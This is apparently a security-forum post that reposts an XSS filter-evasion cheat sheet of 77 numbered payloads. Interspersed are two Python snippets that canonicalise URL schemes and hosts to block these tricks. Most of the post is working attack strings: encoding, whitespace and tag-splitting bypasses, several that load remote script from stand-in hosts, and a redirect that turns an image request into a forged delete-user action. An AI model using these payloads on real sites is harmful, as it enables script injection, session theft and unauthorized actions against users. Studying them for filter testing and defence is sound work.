It seems t00ls has relatively little material on XSS, so I copied over something good I came across; not sure whether any fellow members need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line JavaScript injected through embedded characters; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (all on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters have basically no effect domestically, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters (1-32&34&39&160&8192-8203&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
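Added defensive example (my own code, not part of the original post or the cheat sheet it copies): a filter that canonicalises a URL the way items 4 to 19 and 47 abuse before looking at its scheme, so case changes, HTML entities, embedded tabs, newlines and NULs, and the extra code points listed in item 47 no longer get a javascript: URL past a plain string match. The ignored-character set and the allowed-scheme list are my assumptions.

```python
import html
import re

# Code points a browser of the period ignored before or inside a URL scheme,
# following item 47's list (1-32, 34, 39, 160, 8192-8203, 12288, 65279) plus
# NUL from items 17/18. Stripping them everywhere is stricter than any browser,
# which is the safe direction for a filter: it can only reject more.
_IGNORED = frozenset(
    [chr(c) for c in range(0, 33)]
    + [chr(34), chr(39), chr(160), chr(12288), chr(65279)]
    + [chr(c) for c in range(8192, 8204)]
)
_SCHEME_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*")
ALLOWED_SCHEMES = frozenset({"http", "https"})  # assumption: what this site links to


def canonical_scheme(url: str) -> str:
    """Scheme the browser would act on, lower-cased; '' if the URL has none."""
    # Undo HTML entity encoding, repeated so a double-encoded &amp;#106; also
    # collapses. html.unescape accepts decimal (&#106;), zero-padded 7-bit
    # (&#0000106) and hex (&#x6A) references with or without the trailing
    # semicolon, which are the forms items 5 and 8-10 rely on.
    decoded = url
    for _ in range(3):
        step = html.unescape(decoded)
        if step == decoded:
            break
        decoded = step
    # Drop the ignorable characters so "jav\tascript", "java\0script" and
    # " javascript" (items 11-15, 17, 19) all collapse to "javascript".
    stripped = "".join(ch for ch in decoded if ch not in _IGNORED)
    head, colon, _ = stripped.partition(":")
    if not colon or not _SCHEME_RE.fullmatch(head):
        return ""
    return head.lower()  # item 4: scheme matching is case-insensitive


def is_safe_link(url: str) -> bool:
    """Allow http(s) and path-relative links only. A scheme-relative "//host/"
    (item 74) is rejected because it changes origin without naming a scheme."""
    scheme = canonical_scheme(url)
    if scheme:
        return scheme in ALLOWED_SCHEMES
    relative = "".join(ch for ch in html.unescape(url) if ch not in _IGNORED)
    return relative[:2] not in ("//", "/\\", "\\/", "\\\\")
```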
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash lets you mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS gets filtered, you can add JS code inside an image and use that instead
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
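Added defensive example for items 70 to 76 (my own code, not the original post's): canonicalising the host of a link before comparing it with an allowlist, so decimal, hex, octal and mixed IP literals, a scheme-relative //host/, a missing www and a trailing dot all reduce to one comparable value. The inet_aton-style parsing rules and the allowlist semantics are my assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

def _ipv4_part(part):
    """One dotted component, parsed as inet_aton does: 0x hex, leading-0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    raise ValueError(part)

def canonical_ipv4(host):
    """Dotted quad for an inet_aton-style IPv4 literal, else None. One to four parts
    are accepted; the last part fills the remaining low-order bytes (items 70-73)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    tail_bytes = 5 - len(nums)  # how many bytes the last part covers
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** tail_bytes:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * tail_bytes)) | nums[-1]
    return str(ipaddress.IPv4Address(value))

def canonical_host(url, page_scheme="https"):
    """Host the browser would connect to: tab/CR/LF removed (item 73), //host/
    resolved against the page scheme (74), trailing dot dropped (76), IPs normalised."""
    target = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    if target.startswith("//"):
        target = page_scheme + ":" + target
    host = urlsplit(target).hostname  # lower-cased; None for path-relative links
    if not host:
        return None
    host = host.rstrip(".")
    return canonical_ipv4(host) or host

def host_allowed(url, allowlist):
    """Allowlist check on the canonical host, never the raw string (item 75: google.com covers www.google.com)."""
    host = canonical_host(url)
    return host is not None and (host in allowlist or any(host.endswith("." + d) for d in allowlist))
```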
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14